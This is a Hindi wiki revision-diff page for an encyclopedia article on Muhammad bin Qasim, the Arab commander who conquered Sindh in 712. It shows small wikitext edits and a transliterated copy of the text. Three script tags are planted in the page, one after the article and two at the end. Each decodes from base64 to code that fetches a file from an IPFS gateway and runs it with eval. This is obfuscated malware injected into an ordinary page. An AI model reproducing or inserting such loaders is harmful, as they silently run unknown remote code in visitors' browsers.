Difference between revisions of "मुहम्मद बिन क़ासिम"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति" to "{{प्रचार}} {{लेख प्रगति")
Line 1: Line 1:
मुहम्मद बिन क़ासिम एक नवयुवक अरब सेनापति था। जिसे [[ईराक़]] के प्रान्तपति [[अल हज्जाज]] ने, जो उसका चाचा और श्वसुर भी था, [[सिन्ध]] के शासक [[दाहिर]] को दण्ड देने के लिए भेजा था। मुहम्मद बिन क़ासिम ने देबल को ध्वस्त करके [[नेरुन]] पर अधिकार कर लिया और [[सिन्धु नदी]] पार करके दाहिर को 712 ई. में राओर के युद्ध में पराजित कर मार डाला। उपरान्त उसने राओर के दुर्ग को ध्वस्त करके राजधानी [[आलोर]] तथा [[मुल्तान]] पर भी अधिकार कर लिया। उसने सिन्धु घाटी के सम्पूर्ण निचले काँठें में अरब शासन स्थापित कर दिया। शासक के रूप में भी उसने यथेष्ट कुशलता का परिचय दिया और समस्त नव विजित प्रदेशों में एक ऐसी शासन व्यवस्था स्थापित की, जिससे राज्य में शान्ति रहे। किन्तु खलीफ़ा [[सुलेमान]] ने असंतुष्ट होकर उसे शासक पद से हटा दिया और विरोधियों के हाथों उसका वध करा दिया।  
+
मुहम्मद बिन क़ासिम एक नवयुवक अरब सेनापति था। जिसे [[ईराक़]] के प्रान्तपति [[अल हज्जाज]] ने, जो उसका चाचा और श्वसुर भी था, [[सिंध प्रांत|सिन्ध]] के शासक [[दाहिर]] को दण्ड देने के लिए भेजा था। मुहम्मद बिन क़ासिम ने देबल को ध्वस्त करके [[नेरुन]] पर अधिकार कर लिया और [[सिन्धु नदी]] पार करके दाहिर को 712 ई. में राओर के युद्ध में पराजित कर मार डाला। उपरान्त उसने राओर के दुर्ग को ध्वस्त करके राजधानी [[आलोर]] तथा [[मुल्तान]] पर भी अधिकार कर लिया। उसने सिन्धु घाटी के सम्पूर्ण निचले काँठें में अरब शासन स्थापित कर दिया। शासक के रूप में भी उसने यथेष्ट कुशलता का परिचय दिया और समस्त नव विजित प्रदेशों में एक ऐसी शासन व्यवस्था स्थापित की, जिससे राज्य में शान्ति रहे। किन्तु खलीफ़ा [[सुलेमान]] ने असंतुष्ट होकर उसे शासक पद से हटा दिया और विरोधियों के हाथों उसका वध करा दिया।  
  
 
{{प्रचार}}
 
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति
|आधार=आधार1
+
|आधार=  
|प्रारम्भिक=
+
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|पूर्णता=
Line 10: Line 10:
 
}}
 
}}
 
[[Category:नया पन्ना]]
 
[[Category:नया पन्ना]]
 +
[[Category:इतिहास कोश]]
 
__INDEX__
 
__INDEX__

Revision as of 15:03, 23 January 2011

muhammad bin qasim ek navayuvak arab senapati tha. jise eeraq ke prantapati al hajjaj ne, jo usaka chacha aur shvasur bhi tha, sindh ke shasak dahir ko dand dene ke lie bheja tha. muhammad bin qasim ne debal ko dhvast karake nerun par adhikar kar liya aur sindhu nadi par karake dahir ko 712 ee. mean raor ke yuddh mean parajit kar mar dala. uparant usane raor ke durg ko dhvast karake rajadhani alor tatha multan par bhi adhikar kar liya. usane sindhu ghati ke sampoorn nichale kaanthean mean arab shasan sthapit kar diya. shasak ke roop mean bhi usane yathesht kushalata ka parichay diya aur samast nav vijit pradeshoan mean ek aisi shasan vyavastha sthapit ki, jisase rajy mean shanti rahe. kintu khalifa suleman ne asantusht hokar use shasak pad se hata diya aur virodhiyoan ke hathoan usaka vadh kara diya.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>